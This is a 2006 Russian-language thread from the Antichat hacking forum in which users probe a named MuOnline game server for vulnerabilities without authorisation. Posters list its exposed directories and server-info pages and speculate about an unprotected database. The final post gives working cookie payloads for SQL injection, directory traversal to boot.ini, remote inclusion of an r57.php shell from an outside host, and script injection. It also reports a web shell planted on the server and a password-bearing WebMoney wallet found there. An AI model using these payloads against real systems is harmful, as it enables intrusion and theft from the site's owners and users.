ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимость на сайте
  #1  
Старый 09.04.2006, 15:54
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


Question Уязвимость на сайте

Всем привет! Вот сайт
http://85.115.112.18/
XSpider говорит что там есть SQL Inject! Вот только я его невижу! Ещё там есть http://85.115.112.18/server-status
P.S. Не верьте моей репутации! Я на самом деле знаю SQL Injection, PHP Injection читаю статейки по XSS а разные юзвери которые незнают что такое брут ходят с неплохими репутациями! Где справедливость?!
 

  #2  
Старый 09.04.2006, 16:51
Аватар для EST a1ien
EST a1ien
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
Провел на форуме:
1269624

Репутация: 114
Отправить сообщение для EST a1ien с помощью ICQ
По умолчанию

Это йгровой сервер игры MuOnline я эго пытался ломануть ничего не вышло вобщем забил на него
 

  #3  
Старый 09.04.2006, 16:53
Аватар для limpompo
limpompo
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553

Репутация: 1329


По умолчанию

__tp://85.115.112.18/main_inc/lang.php

__tp://85.115.112.18/server-info
 

  #4  
Старый 09.04.2006, 17:31
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

http://mu.partylife.lv/index.php?pg=adm еще одно раскрытие
 

  #5  
Старый 10.04.2006, 00:12
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

EST a1ien, тоже MuOnline увлекаешься =) Я просто MuOnline люблю исследовать, потомучто не умею запросами выбивать названия таблиц, а так всё зарание знаю =)

Зкажите почему XSpider выдаёт SQL Inject Я лично его там невижу!

Хмм... Интересно... Если вписать %27 то он его не фильтрует, но и нет ошибки =(
А если так, фильтрует http://mu.partylife.lv/index.php?pg=lang&lg=ru%27

И раз уж все дружно ищем кривой php =) То вот
http://mu.partylife.lv/index.php?pg=lang&lg=ru
И естествено
http://mu.partylife.lv/index.php?pg=lang&lg=en

Ещё кое-что... Не уязвимость, но понятно сколько их там =) Защёл в любую папку! http://mu.partylife.lv/user_images/ Посмотрел HTML
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://mu.partylife.lv/">
По моему не хватает пару " Ну кто так делает... Что за админ там...

У меня ещё вопрос... Можно-ли как-то подконнектиться к ихней MySQL... Судя по сайту у них там скорей всего root без пароля, серверный адресс мы знаем =) Можно попытаться, но только если есть такое чудо, как "Подключение к чужой MySQL"

<offtopic>
Нда... Может я заслужил свою репутацию -4! Даже тему немогу создать там где надо! Перенесите плиз
Форум АНТИЧАТ > ОФФТОП > Болталка > Развлечения > On-line игры и другие. Уязвимости. Коды.
</offtopic>

Вот ещё немного папок!
http://mu.partylife.lv/downloads/
http://mu.partylife.lv/index/
http://mu.partylife.lv/login/
http://mu.partylife.lv/logout/
http://mu.partylife.lv/server-status/ - Интересно...
http://mu.partylife.lv/server-info/ - Оч интересно...
http://mu.partylife.lv/src/
http://mu.partylife.lv/stats/
http://mu.partylife.lv/video/
http://mu.partylife.lv/includes/
http://mu.partylife.lv/img/
http://mu.partylife.lv/menu/
http://mu.partylife.lv/img/misc/

Многие из них бесполезны! Но меня оч заинтересовало /server-info/

Последний раз редактировалось Ponchik; 10.04.2006 в 17:37..
 

  #6  
Старый 10.04.2006, 19:37
Аватар для EST a1ien
EST a1ien
Участник форума
Регистрация: 02.04.2006
Сообщений: 273
Провел на форуме:
1269624

Репутация: 114
Отправить сообщение для EST a1ien с помощью ICQ
По умолчанию

Вопервых там стоит винда во вторых MSSQL
а в третьих _http://mu.partylife.lv/index.php?pg=lang&lg=ru здесь нету как я понял запроса к базе а просто идет через case
 

  #7  
Старый 11.04.2006, 00:38
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию

О, кстати, я тут собираюсь исходники MuOnline на баги тестить Version=0.97.04 У кого есть какие-либо наработки по этой версии?
 

  #8  
Старый 11.04.2006, 04:02
Аватар для Ponchik
Ponchik
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219

Репутация: 2274


По умолчанию

1ten0.0net1, у меня есть 97 сервак с Castle Siege, Chaos Castle тама все порты переделаны, на нём не идёт Hack Speed, MuPie и много другой читерской фигни! Вот такой вот 97... Жестоко его переделали!
 

  #9  
Старый 11.04.2006, 15:28
Аватар для 1ten0.0net1
1ten0.0net1
Time out
Регистрация: 28.11.2005
Сообщений: 547
Провел на форуме:
2320925

Репутация: 1348


По умолчанию

2 Ponchik Я этой дрянбю интересуюсь исключительно в технических целях, а не игровых.
 

  #10  
Старый 11.04.2006, 18:23
Аватар для Go0o$E
Go0o$E
Members of Antichat - Level 5
Регистрация: 27.01.2006
Сообщений: 258
Провел на форуме:
6127131

Репутация: 774
По умолчанию

А вот есть там SQL injection! И еще Directory traversal, File inclusion и Cross Site Scripting. И все это в cookies, в параметре lang и в char. char=' ; lang=../../../../../../../../boot.ini ; lang=http://site.ru/r57.php ; lang=><script>alert(/ok/)</script>. Тут - http://85.115.112.18/inc.php r57shell =)

На диске d:\lol валяется webmoney с паролем. Мой кошелек - Z305549227839 если что8).

Shell удалил, так как уже один есть.
__________________

Завтра будет.Лучше.

Последний раз редактировалось Go0o$E; 11.04.2006 в 18:57..
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ошибки Windows dinar_007 Windows 19 01.07.2007 13:32
Уязвимость на правительственном сайте Mobile Уязвимости 3 03.04.2006 16:49
уязвимость на сайте gannibal Уязвимости 8 24.01.2006 12:49
Есть ли уязвимость в форумах созданных на http://www.1bb.ru/ ? bike Форумы 2 24.12.2005 17:28
Уязвимость в iChat'е. -SX- Болталка 0 15.01.2005 23:46



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ